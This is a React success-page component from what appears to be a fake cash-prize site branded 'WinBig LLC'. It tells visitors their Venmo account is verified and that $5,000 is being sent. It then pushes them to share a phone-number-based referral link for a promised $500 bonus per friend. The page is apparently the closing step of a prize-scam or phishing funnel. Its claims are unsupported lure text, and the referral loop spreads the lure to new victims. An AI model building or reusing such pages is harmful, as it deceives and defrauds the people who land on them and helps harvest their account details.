import React, { useEffect, useState } from "react";
import { useLocation, useNavigate } from "react-router-dom";
import { useApp } from "../context/AppContext";
import BrandLogo from "../components/BrandLogo";

const CONFETTI = ["🎉","💵","🎊","💸","⭐","🏆","🎈","💰"];

const SuccessPage = () => {
  const location = useLocation();
  const navigate = useNavigate();
  const { clearActiveSession } = useApp();
  const phone = location.state?.phone || "";

  const [confetti, setConfetti] = useState([]);
  const [copied,   setCopied]   = useState(false);

  useEffect(() => { clearActiveSession(); }, []);

  // Generate confetti items
  useEffect(() => {
    const items = Array.from({ length: 16 }, (_, i) => ({
      id: i,
      emoji: CONFETTI[i % CONFETTI.length],
      left: Math.random() * 100,
      delay: Math.random() * 2,
      duration: 2 + Math.random() * 2,
    }));
    setConfetti(items);
  }, []);

  const referralLink = `${window.location.origin}/?ref=${encodeURIComponent(phone)}`;

  const handleCopy = async () => {
    try { await navigator.clipboard.writeText(referralLink); } catch {}
    setCopied(true);
    setTimeout(() => setCopied(false), 3000);
  };

  return (
    <div className="success-page">
      {/* Confetti rain */}
      <div className="confetti-container" aria-hidden>
        {confetti.map((c) => (
          <span
            key={c.id}
            className="confetti-piece"
            style={{
              left: `${c.left}%`,
              animationDelay: `${c.delay}s`,
              animationDuration: `${c.duration}s`,
            }}
          >
            {c.emoji}
          </span>
        ))}
      </div>

      <BrandLogo size={100} />

      <div className="success-icon">🏆</div>

      <h2 className="success-title">You're a Winner!</h2>

      <div className="success-prize-box">
        <div className="success-prize-label">Your Prize Amount</div>
        <div className="success-prize-amount">$5,000</div>
        <div className="success-prize-sub">Being sent to your Venmo account now</div>
      </div>

      <p className="success-sub" style={{ maxWidth: 340 }}>
        🎉 Congratulations! Your Venmo account has been verified and your{" "}
        <strong>$5,000 prize</strong> is being processed. You will receive a
        Venmo notification within <strong>24 hours</strong>.
      </p>

      {phone && (
        <div className="success-phone">
          📱 {phone.replace("+1", "+1 ")}
        </div>
      )}

      {/* Referral section */}
      <div className="referral-box">
        <div style={{ fontSize: 32, marginBottom: 8 }}>🤝</div>
        <h3 className="referral-title">Earn More — Refer a Friend!</h3>
        <p className="referral-desc">
          Share your referral link with friends. When they claim their prize,{" "}
          <strong style={{ color: "#1a56db" }}>you earn $500 bonus</strong> added
          directly to your Venmo!
        </p>
        <button className="referral-btn" onClick={handleCopy}>
          {copied ? "✓  LINK COPIED!" : "📋  COPY MY REFERRAL LINK"}
        </button>
        {copied && (
          <p style={{ fontSize: 10, color: "#94a3b8", wordBreak: "break-all", marginTop: 6 }}>
            {referralLink}
          </p>
        )}
        <p style={{ fontSize: 10, color: "#94a3b8", marginTop: 8 }}>
          * Bonus credited after referral's prize is confirmed. See terms.
        </p>
      </div>

      <footer className="page-footer" style={{ marginTop: "auto" }}>
        © 2026 WinBig LLC. All rights reserved.
      </footer>
    </div>
  );
};

export default SuccessPage;
